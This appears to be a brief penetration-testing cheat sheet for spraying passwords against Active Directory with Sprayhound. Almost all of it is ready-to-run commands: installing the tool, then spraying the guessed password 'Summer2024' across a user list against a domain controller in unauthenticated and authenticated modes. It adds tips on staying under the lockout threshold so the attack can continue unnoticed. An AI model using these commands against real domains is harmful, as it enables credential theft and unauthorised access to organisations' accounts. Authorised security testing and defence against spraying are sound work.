Active Directory Password Spraying

Install Sprayhound

# Kali Linux
sudo apt install sprayhound -y

# Non-Kali
pipx install git+https://github.com/Hackndo/sprayhound.git

Run (Unauthenticated)

sprayhound -U userlist.txt -d $ADDOMAIN -dc $ADCONTROLLER -p 'Summer2024'

Be careful not to lock out accounts! Unauthenticated mode performs no check of the bad-password count before each attempt!

Run (Authenticated)

sprayhound -U userlist.txt -lu $ADUSER -lp $(PSWPRMPT) -t 2 -d $ADDOMAIN -dc $ADCONTROLLER -p 'Summer2024';PSW=""

-t 2 is used to stop guessing against an account when it is two failed attempts away from the lockout threshold.

Note that the lockout count will only reset with a valid login, even if the policy allows more failed attempts after a certain amount of time. Therefore, this doesn't allow you to spray at the maximum frequency.
